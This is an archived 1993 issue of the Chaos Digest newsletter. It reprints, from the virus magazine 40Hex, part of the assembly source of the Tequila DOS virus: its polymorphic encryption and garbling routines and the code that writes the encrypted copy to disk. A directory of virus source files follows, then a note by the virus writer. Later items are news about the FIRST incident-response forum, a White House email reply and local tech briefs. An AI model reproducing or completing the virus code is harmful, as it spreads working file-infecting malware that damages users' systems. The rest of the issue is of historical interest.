home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / KAOS1_44.ZIP / KAOS1-44
Text File  |  1993-06-03  |  28KB  |  826 lines

  1. Chaos Digest              Mercredi 2 Juin 1993        Volume 1 : Numero 44
  2.                              ISSN 1244-4901
  3.  
  4.        Editeur: Jean-Bernard Condat (jbcondat@attmail.com)
  5.        Archiviste: Yves-Marie Crabbe
  6.        Co-Redacteurs: Arnaud Bigare, Stephane Briere
  7.  
  8. TABLE DES MATIERES, #1.44 (2 Juin 1993)
  9. File 1--40H VMag Issue 1 Volume 4 #012(2)-014 (reprint)
  10. File 2--Adresse electronique de Bill Clinton (news)
  11. File 3--FIRST, nouveau forum anti-hackers aux USA (lutte)
  12. File 4--Liste de diffusion de _The Hack Report_ (abonnement)
  13. File 5--Autre type de chaos (identification)
  14.  
  15. Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
  16. available at no cost by sending a message to:
  17.                 linux-activists-request@niksula.hut.fi
  18. with a mail header or first line containing the following informations:
  19.                     X-Mn-Admin: join CHAOS_DIGEST
  20.  
  21. The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
  22. or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
  23. 155, 93404 St-Ouen Cedex, France.  He is a member of the EICAR and EFF (#1299)
  24. groups.
  25.  
  26. Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352)
  27. 466893.  Back issues of ChaosD can be found on the Internet as part of the
  28. Computer underground Digest archives. They're accessible using anonymous FTP:
  29.  
  30.         * kragar.eff.org [192.88.144.4] in /pub/cud/chaos
  31.         * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
  32.         * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
  33.         * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
  34.         * cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos
  35.         * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
  36.         * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
  37.         * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos
  38.  
  39. CHAOS DIGEST is an open forum dedicated to sharing French information among
  40. computerists and to the presentation and debate of diverse views. ChaosD
  41. material may be reprinted for non-profit as long as the source is cited.
  42. Some authors do copyright their material, and they should be contacted for
  43. reprint permission.  Readers are encouraged to submit reasoned articles in
  44. French, English or German languages relating to computer culture and
  45. telecommunications.  Articles are preferred to short responses.  Please
  46. avoid quoting previous posts unless absolutely necessary.
  47.  
  48. DISCLAIMER: The views represented herein do not necessarily represent
  49.             the views of the moderators. Chaos Digest contributors
  50.             assume all responsibility for ensuring that articles
  51.             submitted do not violate copyright protections.
  52.  
  53. ----------------------------------------------------------------------
  54.  
  55. Date: Tue May 11 09:24:40 PDT 1993
  56. From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. )
  57. Subject: File 1--40H VMag Issue 1 Volume 4 #012(2)-014 (reprint)
  58.  
  59. [suite du listing du virus Tequila]
  60.  
  61.  
  62. WRITE_THE_NEW_HEADER:
  63.    CALL 0696             ;Masm Mod. Needed
  64.  OUT_OF_ENCRYPT:
  65.    RET
  66.  
  67. COPY_TO_HIGH_MEMORY_ENCRYPT_WRITE:
  68.    PUSH BP
  69.    XOR AH,AH
  70.    INT 01A
  71.    MOV AX,DX
  72.    MOV BP,DX
  73.    PUSH DS
  74.    POP ES
  75.    MOV DI,0960
  76.    MOV SI,DI
  77.    MOV CX,020
  78.    CLD
  79.    REP STOSW
  80.    XOR DX,DX
  81.    MOV ES,DX
  82.    CALL ENCRYPT_STEP_ONE
  83.    CALL ENCRYPT_STEP_TWO
  84.    CALL ENCRYPT_STEP_THREE
  85.    MOV B[SI],0E9
  86.    MOV DI,028C
  87.    SUB DI,SI
  88.    SUB DI,3
  89.    INC SI
  90.    MOV W[SI],DI
  91.    MOV AX,0A04
  92.    CALL AX
  93.    POP BP
  94.    RET
  95.  
  96. ENCRYPT_STEP_ONE:
  97.    DEC BP
  98.    ES TEST B[BP],2           ;Masm Mod. Needed
  99.    JNE 08EB                  ;Masm Mod. Needed
  100.    MOV B[SI],0E
  101.    INC SI
  102.    CALL GARBLER
  103.    MOV B[SI],01F
  104.    INC SI
  105.    CALL GARBLER
  106.    RET
  107.    MOV W[SI],0CB8C
  108.    INC SI
  109.    INC SI
  110.    CALL GARBLER
  111.    MOV W[SI],0DB8E
  112.    INC SI
  113.    INC SI
  114.    CALL GARBLER
  115.    RET
  116.  
  117. ENCRYPT_STEP_TWO:
  118.    AND CH,0FE
  119.    DEC BP
  120.    ES TEST B[BP],2           ;Masm Mod. Needed
  121.    JE 0920                   ;Masm Mod. Needed
  122.    OR CH,1
  123.    MOV B[SI],0BE
  124.    INC SI
  125.    MOV W[SI],BX
  126.    INC SI
  127.    INC SI
  128.    CALL GARBLER
  129.    ADD BX,0960
  130.    TEST CH,1
  131.    JE 0934                   ;Masm Mod. Needed
  132.    MOV B[SI],0BB
  133.    INC SI
  134.    MOV W[SI],BX
  135.    INC SI
  136.    INC SI
  137.    CALL GARBLER
  138.    ADD BX,0960
  139.    TEST CH,1
  140.    JE 090C                   ;Masm Mod. Needed
  141.    SUB BX,0960
  142.    CALL GARBLER
  143.    MOV B[SI],0B9
  144.    INC SI
  145.    MOV AX,0960
  146.    MOV W[SI],AX
  147.    INC SI
  148.    INC SI
  149.    CALL GARBLER
  150.    CALL GARBLER
  151.    RET
  152.  
  153. ENCRYPT_STEP_THREE:
  154.    MOV AH,014
  155.    MOV DH,017
  156.    TEST CH,1
  157.    JE 0958                   ;Masm Mod. Needed
  158.    XCHG DH,AH
  159.    MOV DI,SI
  160.    MOV AL,08A
  161.    MOV W[SI],AX
  162.    INC SI
  163.    INC SI
  164.    CALL GARBLER
  165.    XOR DL,DL
  166.    MOV B[0A39],028           ;Masm Mod. Needed
  167.    DEC BP
  168.    ES TEST B[BP],2           ;Masm Mod. Needed
  169.    JE 0978                   ;Masm Mod. Needed
  170.    MOV DL,030
  171.    MOV B[0A39],DL            ;Masm Mod. Needed
  172.    MOV W[SI],DX
  173.    INC SI
  174.    INC SI
  175.    MOV W[SI],04346
  176.    INC SI
  177.    INC SI
  178.    CALL GARBLER
  179.    MOV AX,0FE81
  180.    MOV CL,0BE
  181.    TEST CH,1
  182.    JE 0993                   ;Masm Mod. Needed
  183.    MOV AH,0FB
  184.    MOV CL,0BB
  185.    MOV W[SI],AX
  186.    INC SI
  187.    INC SI
  188.    PUSH BX
  189.    ADD BX,040
  190.    MOV W[SI],BX
  191.    INC SI
  192.    INC SI
  193.    POP BX
  194.    MOV B[SI],072
  195.    INC SI
  196.    MOV DX,SI
  197.    INC SI
  198.    CALL GARBLER
  199.    MOV B[SI],CL
  200.    INC SI
  201.    MOV W[SI],BX
  202.    INC SI
  203.    INC SI
  204.    MOV AX,SI
  205.    SUB AX,DX
  206.    DEC AX
  207.    MOV BX,DX
  208.    MOV B[BX],AL
  209.    CALL GARBLER
  210.    CALL GARBLER
  211.    MOV B[SI],0E2
  212.    INC SI
  213.    SUB DI,SI
  214.    DEC DI
  215.    MOV AX,DI
  216.    MOV B[SI],AL
  217.    INC SI
  218.    CALL GARBLER
  219.    RET
  220.  
  221. GARBLER:
  222.    DEC BP
  223.    ES TEST B[BP],0F          ;Masm Mod. Needed
  224.    JE RET                    ;Masm Mod. Needed
  225.    DEC BP
  226.    ES MOV AL,B[BP]           ;Masm Mod. Needed
  227.    TEST AL,2
  228.    JE 0A0E                   ;Masm Mod. Needed
  229.    TEST AL,4
  230.    JE 09F7                   ;Masm Mod. Needed
  231.    TEST AL,8
  232.    JE 09F1                   ;Masm Mod. Needed
  233.    MOV W[SI],0C789
  234.    INC SI
  235.    INC SI
  236.    JMP RET                   ;Masm Mod. Needed
  237.    MOV B[SI],090
  238.    INC SI
  239.    JMP RET                   ;Masm Mod. Needed
  240.    MOV AL,085
  241.    DEC BP
  242.    ES MOV AH,B[BP]           ;Masm Mod. Needed
  243.    TEST AH,2
  244.    JE 0A05                   ;Masm Mod. Needed
  245.    DEC AL
  246.    OR AH,0C0
  247.    MOV W[SI],AX
  248.    INC SI
  249.    INC SI
  250.    JMP RET                   ;Masm Mod. Needed
  251.    DEC BP
  252.    ES TEST B[BP],2           ;Masm Mod. Needed
  253.    JE 0A1A                   ;Masm Mod. Needed
  254.    MOV AL,039
  255.    JMP 09F9                  ;Masm Mod. Needed
  256.    MOV B[SI],0FC
  257.    INC SI
  258.    RET
  259.  
  260. MAKE_THE_DISK_WRITE:
  261.    CALL PERFORM_ENCRYPTION_DECRYPTION
  262.    MOV AH,040
  263.    MOV BX,W[09A4]
  264.    MOV DX,0
  265.    MOV CX,09A4
  266.    PUSHF
  267.    CALL D[09B4]              ;Masm Mod. Needed
  268.    JB 0A37                   ;Masm Mod. Needed
  269.    SUB AX,CX
  270.    PUSHF
  271.    CMP B[0A39],028           ;Masm Mod. Needed
  272.    JNE 0A44                  ;Masm Mod. Needed
  273.    MOV B[0A39],0             ;Masm Mod. Needed
  274.    CALL PERFORM_ENCRYPTION_DECRYPTION
  275.    POPF
  276.    RET
  277.  
  278. PERFORM_ENCRYPTION_DECRYPTION:
  279.    MOV BX,0
  280.    MOV SI,0960
  281.    MOV CX,0960
  282.    MOV DL,B[SI]
  283.    XOR B[BX],DL
  284.    INC SI
  285.    INC BX
  286.    CMP SI,09A0
  287.    JB 0A61                   ;Masm Mod. Needed
  288.    MOV SI,0960
  289.    LOOP 0A52                 ;Masm Mod. Needed
  290.    RET
  291.  
  292. THE_FILE_DECRYPTING_ROUTINE:
  293.    PUSH CS
  294.    POP DS
  295.    MOV BX,4
  296.    MOV SI,0964
  297.    MOV CX,0960
  298.    MOV DL,B[SI]
  299.    ADD B[BX],DL
  300.    INC SI
  301.    INC BX
  302.    CMP SI,09A4
  303.    JB 0A7E                   ;Masm Mod. Needed
  304.    MOV SI,0964
  305.    LOOP 0A6F                 ;Masm Mod. Needed
  306.    JMP 0390                  ;Masm Mod. Needed
  307.  
  308. ;========== THE FOLLOWING IS NOT PART OF THE VIRUS ========
  309. ;==========       BUT IS MERELY THE BOOSTER.       ========
  310.  
  311. START:
  312.    LEA W[0104],EXIT          ;Masm Mod. Needed
  313.    MOV W[0106],CS            ;Masm Mod. Needed
  314.    MOV BX,CS
  315.    SUB W[0106],BX            ;Masm Mod. Needed
  316.    JMP INSTALL
  317.  
  318. EXIT:
  319.    INT 020
  320.  
  321. TEQUILA ENDP
  322. CODE_SEG ENDS
  323. END TEQUILA
  324.  
  325. +++++
  326.  
  327. 40Hex Issue 4                                            December 1991
  328.  
  329. Left Blank
  330. Cause its bad
  331. luck
  332.     how about something real dumb like....
  333.  
  334.  
  335. Directory of C:\TASM
  336.  
  337. .            <DIR>     11-28-91  11:44a
  338. ..           <DIR>     11-28-91  11:44a
  339. LAB          <DIR>     12-10-91   8:45p
  340. 1605     ASM     38553 12-09-91  12:31p
  341. 911      ASM     19267 12-10-91   7:21p
  342. 911      SDF      7084 12-10-91  10:41p
  343. BBRAINS  ASM      8990 08-06-91   3:04p
  344. BMONDAY  ASM     21455 12-09-91  12:31p
  345. BOBVIRUS ASM     21280 12-14-91   4:38p
  346. BRU_TEST COM        11 12-16-91   1:52p
  347. CANCER   ASM      2600 02-09-91  12:38a
  348. DARTH2   ASM      8938 12-09-91  11:50a
  349. DEADPOOL ASM      5324 12-14-91   1:00a
  350. DIR2SCAN ASM       892 12-22-91   1:17a
  351. DIR2SCAN COM       112 12-22-91   1:17a
  352. EMFII    ASM     16755 12-08-91  10:55p
  353. FILES    DOC      2373 12-11-91   9:58a
  354. FUNNY    ASM      5807 12-18-91  12:46p
  355. FUNNY    COM       208 12-18-91  12:46p
  356. GREP     DOC     13619 03-13-91   2:02a
  357. HAPPY    ASM      5667 12-18-91  12:32p
  358. HAPPY    MAP        34 12-25-91  11:27a
  359. HEADER              94 12-09-91  10:25a
  360. JOKER    ASM     16258 11-10-91  10:55p
  361. KILL-FSP ASM      1475 11-12-91   4:28p
  362. KILL-FSP COM        55 12-25-91  11:26a
  363. KILL-FSP EXE       823 12-25-91  11:26a
  364. KILL-FSP MAP       103 12-25-91  11:26a
  365. KILL-FSP OBJ       195 12-25-91  11:26a
  366. MAKE     EXE     37056 03-13-91   2:02a
  367. MANUAL   DOC     52126 03-13-91   2:02a
  368. MBIOS    MAC     13380 03-13-91   2:02a
  369. MG-1     ASM      4527 12-17-91  10:58a
  370. MG-1     SDF      2319 12-17-91  10:58a
  371. NAILME   ASM       206 12-18-91  10:01p
  372. NAILME   COM       100 12-19-91  10:26a
  373. OBJXREF  DOC     18404 03-13-91   2:02a
  374. PARITY   ASM      5837 12-09-91  12:49p
  375. PH-VIR1  TXT     22086 11-04-91   9:00p
  376. PROLOG   DOC     23811 03-13-91   2:02a
  377. RAGE     ASM      9335 11-29-91  12:17p
  378. SR       EXE    117543 10-30-89   8:00a
  379. SURVEY   DOC      4479 11-29-91   1:01p
  380. TASM     EXE    106521 03-13-91   2:02a
  381. TASM     TAH    167927 03-13-91   2:02a
  382. TCREF    DOC      4954 03-13-91   2:02a
  383. TCREF    EXE      7856 03-13-91   2:02a
  384. TD       EXE    409360 03-13-91   2:02a
  385. TDCONFIG TD       1208 12-06-91  12:01p
  386. TDCONVRT EXE     35366 03-13-91   2:02a
  387. TDDEV    EXE      8544 03-13-91   2:02a
  388. TDHELP   TDH    126541 03-13-91   2:02a
  389. TDINST   EXE    107638 03-13-91   2:02a
  390. TDMAP    EXE     16944 03-13-91   2:02a
  391. TDMEM    EXE     14256 12-24-91   8:19p
  392. TDNMI    COM       644 03-13-91   2:02a
  393. TDPACK   EXE     25520 03-13-91   2:02a
  394. TDREMOTE EXE     20738 03-13-91   2:02a
  395. TDRF     EXE     17376 03-13-91   2:02a
  396. TDSTRIP  EXE     13868 03-13-91   2:02a
  397. TDUMP    EXE     70554 03-13-91   2:02a
  398. THELP    COM      9912 11-28-91  11:46a
  399. THELP    DOC      7619 03-13-91   2:02a
  400. TINY     ASM      4233 01-01-80  12:26a
  401. TINY     TXT        92 01-01-80  12:25a
  402. TINYB    ASM      4404 01-01-80  12:32a
  403. TINYB    TXT        89 01-01-80  12:31a
  404. TINYC    ASM      4669 01-01-80  12:14a
  405. TINYC    TXT       118 01-01-80  12:31a
  406. TINYD    ASM      5486 01-01-80  12:02a
  407. TINYE    ASM      6464 01-01-80  12:09a
  408. TLIB     EXE     35668 03-13-91   2:02a
  409. TLINK    DOC      3837 03-13-91   2:02a
  410. TLINK    EXE     53510 03-13-91   2:02a
  411. TOUCH    COM      5118 03-13-91   2:02a
  412. UPDATE   DOC     20266 03-13-91   2:02a
  413. VIENNA   ASM     26395 09-30-87  12:59a
  414. VIOL-C   ASM     19096 12-16-91  10:25p
  415. VSAFE    COM     32050 03-28-91   1:00p
  416. VWATCH   COM     12263 03-28-91   1:00p
  417. WIN      COM     19358 12-24-91   9:52p
  418. WINFIX   ASM      2603 12-21-91   8:18p
  419. WINFIX   COM       357 12-24-91   9:52p
  420. WINFIX   MAP       103 12-24-91   9:52p
  421. WINFIX   OBJ       553 12-24-91   9:52p
  422.        85 file(s)    1939259 bytes
  423.  
  424. Directory of C:\TASM\LAB
  425.  
  426. .            <DIR>     12-10-91   8:45p
  427. ..           <DIR>     12-10-91   8:45p
  428. LAB          <DIR>     12-10-91   8:46p
  429. AMAG0589 TXT     46529 05-21-89   7:06p
  430. AMAG1289 TXT    113270 12-16-89  12:21p
  431. BIT      ASM       778 08-30-91   8:33p
  432. BIT      MAP       103 12-24-91  11:31p
  433. BIT      OBJ       192 12-24-91  11:31p
  434. BUGOFF   ASM       903 12-25-91  11:59a
  435. BUGOFF   COM        43 12-25-91  11:59a
  436. BUGOFF   MAP       103 12-25-91  11:59a
  437. BUGOFF   OBJ       198 12-25-91  11:59a
  438. CRACK-W  ASM      1430 12-24-91   7:49p
  439. CRACK-W  MAP       103 12-24-91   7:47p
  440. DIR      ASM     10274 12-25-91  12:46a
  441. DIR      MAP        99 12-25-91  12:48a
  442. DIR      OBJ       961 12-25-91  12:48a
  443. DIR      SDF      5032 12-25-91  12:46a
  444. DL       ASM       416 12-14-91   6:35p
  445. DUMB     DOC     52346 12-19-91   1:46p
  446. ENW                  3 12-19-91   6:02p
  447. EXE_FILE ASM        80 12-24-91  12:36a
  448. EXE_FILE EXE       516 12-24-91  12:36a
  449. EXE_FILE MAP       220 12-24-91  12:36a
  450. EXE_FILE OBJ       183 12-24-91  12:36a
  451. FUCK_UP  DOC       198 12-23-91  10:33a
  452. FUNGUS   ASM     17120 12-21-91   1:37p
  453. FUNGUS   SDF      4933 12-21-91   1:34p
  454. HAP      ASM      2440 12-16-91  12:42p
  455. HAPPY    ASM      7144 12-25-91  11:30a
  456. HAPPY    COM       248 12-25-91  11:28a
  457. HAPPY    MAP        99 12-25-91  11:28a
  458. HAPPY    OBJ       424 12-25-91  11:28a
  459. HEADER              94 12-09-91  10:25a
  460. KENNEDY  ASM      6663 12-25-91  12:43a
  461. KENNEDY  SDF      2803 12-25-91  12:43a
  462. KILL     ASM       517 12-19-91   6:05p
  463. MAR-INST BAT       205 08-31-91  12:13a
  464. MAR-INST DOC      1037 08-31-91  12:20a
  465. MARAUDER ASM     21997 12-23-91  10:21a
  466. MARAUDER DOC      2305 12-20-91   9:40a
  467. MAR_ASM! ZIP      5361 12-23-91  10:35a
  468. MODES    ASM       244 12-25-91   7:22p
  469. MODES    COM         7 12-25-91   7:22p
  470. MODES    MAP        99 12-25-91   7:22p
  471. MODES    OBJ       136 12-25-91   7:22p
  472. NEW      ASM     21997 12-23-91  10:21a
  473. NEW      COM       869 12-25-91  12:12a
  474. NEW      MAP       103 12-25-91  12:12a
  475. NEW      OBJ      1261 12-25-91  12:12a
  476. NEW_KILL ASM      1318 12-23-91  10:29a
  477. NEXT     ASM      2208 12-25-91  12:41a
  478. PS       ANS      3218 11-25-91   9:43p
  479. SECTOR   ASM      1573 12-11-91  10:52p
  480. SS       DOC       270 08-08-91   3:00p
  481. SS       EXE      6898 08-08-91   3:00p
  482. TARGET   ASM       472 12-20-91   3:32p
  483. TARGET   COM       100 12-25-91   8:53p
  484. TARGET   MAP       103 12-25-91   8:53p
  485. TARGET   OBJ       261 12-25-91   8:53p
  486.        60 file(s)     348507 bytes
  487.  
  488. Directory of C:\TASM\LAB\LAB
  489.  
  490. .            <DIR>     12-10-91   8:46p
  491. ..           <DIR>     12-10-91   8:46p
  492.         2 file(s)          0 bytes
  493.  
  494. Total files listed:
  495.       147 file(s)    2287766 bytes
  496.                      1843200 bytes free
  497.  
  498. +++++
  499.  
  500. 40Hex Issue 4                                            December 1991
  501.  
  502.                             Is This The End?
  503.                             ++++++++++++++++
  504.  
  505.    Well, to be honest.  I'm kind of tired writing this magazine.  It's
  506.    not like I hate it or anything, it's just too much pressure for one
  507.    person to handle.  Decimator helped me out a bit with a few articals
  508.    and such.  But still every time I do an issue it's me who does the
  509.    marjority of the work.  It seems the magazine is bigger than I
  510.    thought.  It seems to be on everybodys BBS from NY to California,
  511.    from Canada to Europe.  The thing is I can't write this thing by
  512.    myself anymore.  I work everyday from 2pm - 10pm and I will be going
  513.    back to school next semester.  So I don't have time to handle all the
  514.    things I do.  So in the long run the magazine suffers.  Anyway,
  515.    unless people want to help out (mabey the reason is that I haven't
  516.    really asked before) lemme know.  Contact me on Digital Warefare.
  517.    The numbers in an artical in this issue somewhere I'm sure.  Anyway,
  518.    fuck it, If people don't contribute soon this may well be the last
  519.    issue of this rag ever.  So whatever happens in 1992, we shall see.
  520.    So if this is it, later people.  My viruses will still be coming on
  521.    strong as always...
  522.  
  523.    Later
  524.    Hellraiser 12/26/91
  525.  
  526. ------------------------------
  527.  
  528. Date: Thu Jun  3 01:48:14 -0400 1993
  529. From: postmaster@whitehouse.gov
  530. Subject: File 2--Adresse electronique de Bill Clinton (news)
  531.  
  532. [ChaosD: Voici la reponse recu a un courrier envoye ce matin au President
  533. des Etats-Unis sur sa nouvelle messagerie ouverte le premier du mois:
  534. President@WhiteHouse.gov.]
  535.  
  536.  
  537.      Thank you for sending in your thoughts and comments to the
  538. President via electronic mail.  We are pleased to introduce this
  539. new form of communication into the White House for the first time
  540. in history.  I welcome your response and participation.
  541.  
  542.      As we work to reinvent government and streamline our
  543. processes, this electronic mail experiment will help put us on
  544. the leading edge of progress.  Please remember, though, this is
  545. still very much an experiment.
  546.  
  547.      Your message has been read, and we are keeping careful track
  548. of all the mail we are receiving electronically.  We will be
  549. trying out a number of response-based systems shortly, and I ask
  550. for your patience as we move forward to integrate electronic mail
  551. from the public into the White House.
  552.  
  553.      Again, on behalf of the President, thank you for your
  554. message and for taking part in the White House electronic mail
  555. project.
  556.  
  557.                                   Sincerely,
  558.  
  559.                         Marsha Scott, Deputy Assistant
  560.                         to the  President and Director
  561.                               of Correspondence
  562.  
  563. ------------------------------
  564.  
  565. Date: May 29, 1993 08:47:48 GMT
  566. From: gregory@email.teaser.com (Gregory Noe )
  567. Subject: File 3--FIRST, nouveau forum anti-hackers aux USA (lutte)
  568. Copyright: Worldwide Videotex & The Baltimore Sun, 1993
  569.  
  570.  
  571. RESPONSE GROUP FORMED TO HANDLE INTERNATIONAL COMPUTER AND NETWORK SECURITY
  572.      PROBLEMS
  573. Mainframe Computing      May 00, 1993   V. 6   NO. 5    p.  1
  574.  
  575. Government  and  private  organizations  in  North  America  and Europe are
  576. joining  forces  to help combat and prevent the world's escalating computer
  577. and network security problems.
  578.  
  579. Known  as  the   *Forum  of  Incident  Response  and  Security  Teams*,  or
  580. FIRST,  the  coalition  brings  together  a  variety  of  computer security
  581. incident  response  teams  from  the public and private sectors, as well as
  582. from  universities.  FIRST  aims  to foster cooperation and coordination in
  583. incident  prevention, to prompt rapid reaction to incidents, and to promote
  584. information  sharing  among its members. FIRST currently includes more than
  585. 20  response  teams  and  liaisons  (see  attached  list  of  participating
  586. organizations).
  587.  
  588. Participation  in  FIRST is voluntary, and member teams must fund their own
  589. involvement.  One  of  FIRST's  chief  goals  is  to  expand  the number of
  590. participating  incident  response teams and to foster increased cooperation
  591. in incident response-related activities.
  592.  
  593. In  general,  a response team is set up to serve a defined constituency. In
  594. many  cases,  a team serves a single organization's computer network users.
  595. Other  teams are operated by computer vendors and deal primarily with their
  596. specific  operating  systems.  Incident response teams generally augment an
  597. organization's  overall  computer  security efforts by focusing on computer
  598. security incidents.
  599.  
  600. The  FIRST  Secretariat  is  responsible  for  various  administrative  and
  601. coordination activities. The National Institute of Standards and Technology
  602. serves as the secretariat.
  603.  
  604. "Computer  security vulnerabilities associated with information technology,
  605. such   as  malicious  abuse  or  viruses,  require  a  rapid,  skilled  and
  606. coordinated  response  to  minimize  damage,"  said  Dennis  Steinauer, who
  607. oversees  NIST's  participation  in  FIRST  and  chairs  the FIRST Steering
  608. Committee.  "For  a  response  team  to  be  effective,  it must have rapid
  609. communication  both  within  its  own  constituency and with other incident
  610. response  teams.  That's  what FIRST aims to accomplish." FIRST members, he
  611. said,  use  automatic  alerting mechanisms, electronic mail and a number of
  612. other methods to achieve this rapid communication.
  613.  
  614. FIRST is working to achieve  several goals:
  615.  
  616. *  To boost cooperation among information technology users in the effective
  617. prevention, detection and recovery from computer security incidents;
  618.  
  619. *  To  provide a means to alert and advise clients on potential threats and
  620. emerging incident situations;
  621.  
  622. *  To  support  and  promote  the  actions  and activities of participating
  623. incident response teams, including research and operational activities; and
  624.  
  625. *  To  simplify  and encourage the sharing of security-related information,
  626. tools and techniques.
  627.  
  628. FIRST  membership has grown quickly from 11 original teams to more than 20.
  629. Although   initial   membership  consisted  primarily  of  U.S.  government
  630. organizations, membership of private-sector organizations, universities and
  631. non-U.S.   organizations   is   growing.   Many   are  finding  that  FIRST
  632. participation  offers  extensive  information  and  help  in  combating and
  633. preventing  computer  security  incidents.  FIRST officials state, however,
  634. that  members  are expected to participate actively in the forum. The FIRST
  635. Secretariat  can  provide  information on establishing an incident response
  636. capability  and  on  FIRST  membership.
  637.  
  638. For more information, contact:
  639.  
  640. FIRST Secretariat
  641. Attn:  Dennis Steinauer
  642. National Institute of Standards and Technology
  643. A216 Technology Building
  644. Gaithersburg, MD 20899-0001
  645. Phone: (301)975-3359
  646. Electronic Mail: first-sec@nist.gov.
  647.  
  648. +++++
  649.  
  650. COMPUTER SECURITY EXPERTS ON THE ALERT
  651. BALTIMORE MORNING SUN (BS) - Monday, May 24, 1993
  652. By: Steve Auerweck Staff Writer
  653. Edition: Final  Section: Financial  Page: 12C
  654.  
  655.  
  656. On  Nov. 2, 1988, Robert Morris, a Cornell University graduate student from
  657. Arnold, set loose a "worm" that soon disabled thousands of computers on the
  658. Internet, an enormous but loose conglomeration of computers nationwide.
  659.  
  660.    Not  long afterward, a group of computer security experts meeting at the
  661. National Security Agency headquarters at Fort Meade to discuss the disaster
  662. laid  the  groundwork  for  FIRST, the *Forum  of  Incident   Response  and
  663. Security Teams.
  664.  
  665.    FIRST,  coordinated  out  of  the  National  Institute  of Standards and
  666. Technology  offices  in  Gaithersburg,  is a coalition of computer security
  667. response teams from both the public and private sectors.
  668.  
  669.    Dennis  Steinauer,  chairman  of the FIRST steering committee, describes
  670. the need this way: "As more and more organizations get themselves hooked up
  671. to  networks  .  .  .  the threat population has increased, or at least the
  672. avenues of exposure."
  673.  
  674.    So  FIRST  now  brings  together a variety of outfits that might need to
  675. respond  swiftly  to security threats. They range from teams at the Defense
  676. Department  to  US Sprint, the Space Physics Analysis Network in France and
  677. the Government Centre for Information Systems in the United Kingdom.
  678.  
  679.    The  idea  is to provide swift communication among members about current
  680. or potential problems, such as computer viruses or virulent hackers.
  681.  
  682.    "We're  not  a  professional or educational organization," Mr. Steinauer
  683. says. "This is an operational activity."
  684.  
  685.    Their  main  avenue  of  communication  is  the  Internet, but they also
  686. learned  a  lesson  in  1988. "We have backup methods in place that we test
  687. from time to time," Mr. Steinauer says, "including the telephone."
  688.  
  689.    FIRST  is  contemplating  staging "a fairly extensive drill"; it has not
  690. yet been challenged by any major incidents.
  691.  
  692. COMPUTER SCIENCES LAB WINS DEFENSE CONTRACT
  693.  
  694.    Computer  Sciences  Corp.  learned  last  week that its Network Security
  695. Integration  Laboratory,  located  near  Fort  Meade,  won a $19.9 million,
  696. four-year  contract to provide information security services to the Defense
  697. Department.
  698.  
  699.    The  laboratory  works with the National Computer Security Center, which
  700. is  affiliated  with  the  NSA.  The  Anne Arundel lab averages 40 workers,
  701. supported  by  another  60  at  CSC's Systems Engineering Division in Falls
  702. Church, Va. No new positions are anticipated here.
  703.  
  704.    CSC,  headquartered  in  El  Segundo,  Calif., had received a $6 million
  705. contract for the first phase of the project last October.
  706.  
  707.    Its  security laboratory evaluates encryption devices built for computer
  708. networks,  telephones,  fax machines and the like, and helps users put them
  709. to work in specific applications. It also tests security systems and builds
  710. mock-ups for Defense Department projects.
  711.  
  712. DIGITAL OFFERS $5,000 TO BREAK V-CARD SYSTEM
  713.  
  714.    Digital  Enterprises  Inc.  of Gaithersburg has a challenge for hackers:
  715. Break its anti-virus scheme and win $5,000.
  716.  
  717.    The  company  sells a hardware/software protection system called V-Card.
  718. If  you  can  beat  the  machine at its headquarters -- no Trojan horses or
  719. bombs allowed, the company says -- you'll win the prize.
  720.  
  721.    Enterprising hackers can call Digital at (301) 926-6937.
  722.  
  723. MICROPROSE GAMES HEADED FOR CD FORMATS
  724.  
  725.    Hunt  Valley's MicroProse Software Inc. has licensed several of its most
  726. popular  game  titles  to  Capitol  Multimedia  Inc. for release in two new
  727. mass-market  compact  disk  formats.  The  Washington company will develop,
  728. market  and  distribute the games for CD-I (CD-Interactive) and Sony CD-ROM
  729. XA machines.
  730.  
  731.    The  titles  covered  by  the  worldwide  pact  are Sid Meier's Pirates,
  732. Railroad  Tycoon  and  Civilization, as well as Silent Service and Airborne
  733. Ranger.
  734.  
  735. WAVERLY TO DISTRIBUTE DAROX VIDEODISCS
  736.  
  737.    Waverly   Inc.'s   Electronic  Media  Division  will  be  the  exclusive
  738. distributor  of interactive videodiscs put out for nursing schools by Darox
  739. Corp. of La Jolla, Calif.
  740.  
  741.    Darox  now  has  32  titles  for  health  professionals, with more being
  742. developed.  They  join other Waverly products for medical instruction, such
  743. as  the  Medi-Sim  computer-assisted  instruction  programs  and  a line of
  744. videos.
  745.  
  746. MAGAZINE SEEKS COMPUTER NIGHTMARES
  747.  
  748.    Has  your computer driven you right to the edge? Are you ready to hire a
  749. disgruntled postal worker to blast the thing to smithereens? Do you long to
  750. fold, spindle and mutilate?
  751.  
  752.    Put  those  problems  on  paper  and  you  may  win a restful weekend in
  753. California, courtesy of San Diego's ComputorEdge Magazine.
  754.  
  755.    Its  Computer  Dementia  Contest  seeks a 1,000-word essay on your worst
  756. computer nightmare. The most horrid wins a weekend out West.
  757.  
  758.    "We  have  a  couple  hundred entries so far," said the magazine's Kevin
  759. Leap.  "Some are pretty hilarious. There was a guy who got Doritos stuck in
  760. the  keyboard and woke up the next morning with 220,000 pages of the letter
  761. 'E.' "
  762.  
  763.    Send entries to P.O. Box 83086, San Diego, Calif. 92138. The deadline is
  764. July 31.
  765. --
  766. *-*-*-*-*-*-*-*-*-*-*-*-*-*-         gregory@email.teaser.com
  767. -    Gregory  NOE          *         ________________________
  768. *    PARIS  (France)       -
  769. -*-*-*-*-*-*-*-*-*-*-*-*-*-*
  770.  
  771. ------------------------------
  772.  
  773. Date: 10 May 1993 03:17:51 GMT
  774. From: doug@cc.ysu.edu (Doug Sewell )
  775. Subject: File 4--Liste de diffusion de _The Hack Report_ (abonnement)
  776.  
  777.  
  778.                       The Hack Report List
